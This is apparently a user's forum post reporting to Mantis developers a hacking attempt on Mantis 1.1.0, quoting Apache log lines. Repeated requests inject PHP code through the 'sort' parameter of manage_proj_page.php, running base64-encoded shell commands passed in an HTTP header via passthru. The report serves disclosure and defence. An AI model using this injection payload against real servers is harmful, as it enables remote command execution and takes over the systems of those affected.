Hello!

My current hosting company has reported the following as a hacking attack, as evidenced in the following apache logs. I am posting this here so maybe the development team notices it and can correct it, it happened on mantis 1.1.0

88.191.51.191 - - [07/Jan/2009:08:11:44 -0600] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 4387 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:11:45 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3968 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:11:48 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3934 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:12:00 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 4070 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:12:32 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3915 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:13:16 -0600] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 4387 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:14:17 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3827 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:15:03 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3827 "-" "-"

Hope it helps,

Gratefully,

Santiago Zapata